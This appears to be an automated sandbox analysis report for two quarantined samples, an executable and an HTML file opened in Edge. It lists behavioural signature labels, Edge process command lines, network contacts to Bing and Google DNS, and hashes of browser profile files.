| SHA512 | 82ce22df63cbb63c3d58f942b69ea4bca392c084f67305c5f63744afd7f4bf571222d4d3118816e60f91f0cf4ac9d9ea75cff5c6334aed1f486d3502d519ad00 |
Analysis: behavioral29
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240729-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"
Network
Files
memory/2916-0-0x000000013F610000-0x000000013F7BE000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
145s
Max time network
139s
Command Line
Signatures
Browser Information Discovery
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8ba2246f8,0x7ff8ba224708,0x7ff8ba224718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3128 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 3c6e13dc1762aa873320bed152204f3c |
| SHA1 | 38df427d38ca5ce6ce203490a9fb8461c7444e12 |
| SHA256 | 5c441148843b7c8dbff4c4a72962a532aaf0bdd484d07a03dd9a32fd461b1371 |
| SHA512 | 133054cb042e11013bfdad1bd11e3407d08cf26a66d0743bea9708d261aa904a1047bb0097b187ecf8436cb6cff3bec28c89e435862cad0e0fa264799556b70c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f5da507c2059b715761792e7106405f0 |
| SHA1 | a277fd608467c5a666cf4a4a3e16823b93c6777f |
| SHA256 | 8c1d99de087ac5f2e7b2afce66eff36a646bef46800c0c1d7737d6f0df74b7e8 |
| SHA512 | 01c92729dd8061aa122b116a674c73bb78016f66d2cb8f7fb64907352758a825e87a1e345334386440699d2a6d1e17baccb400c5aee151eb64e64019cbebb870 |
\??\pipe\LOCAL\crashpad_2560_IPXIRUHBMCTZIZTP
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7b1714b9cd75ac382f61a090f333f520 |
| SHA1 | 7191b8e8f7cf5fecd33489dc7119bef1a833d6c1 |
| SHA256 | 0505e56cb286f6371e3c3f80aa45a124cec3ecce0c3a31248d8deee8edefec88 |
| SHA512 | 4eca557fb1178034818a1ec46e681b3936cc0edde93b36efdde813f4ab1f0ab74093388dba5d789d394e13a62b07c159d04fd89488951bcce35e36ae738b1c33 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1d4b5d6d4b2cc77c1748d5028b40f9fc |
| SHA1 | 9f3379d6162b95d74557d281bb403bb4a7ea17c5 |
| SHA256 | 7e5a7ccafb2a041d8b444184799beec08bda9ab2b778c3df42cea52d85155ed9 |
| SHA512 | 5899b9d61e04bab124f530af472f3b3b864b8c170e9a9a3d54d88ab77b85ae6b5bdef54c6f5cf03a839cd872359de80e11b9a6e3ca5b1f4b986b53cf9138a681 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8e07abdf4a3961e1baff4397a3ac770d |
| SHA1 | 743cd84f84cfe0bc6d8f2a620be541ead4ffc02e |
| SHA256 | 855a90255da0a76af0fdcee2c63ad9cabe22a84c2d983fb7cf688869538a96dc |
| SHA512 | 5d2ddcbf597eac6c8a2eca504e16084c3b86b597d83eebeb74f22c6fe9abf56973f9e2370c8daa4056077d774b9fff2ba316a778a4a7146d38da70ce7c20656a |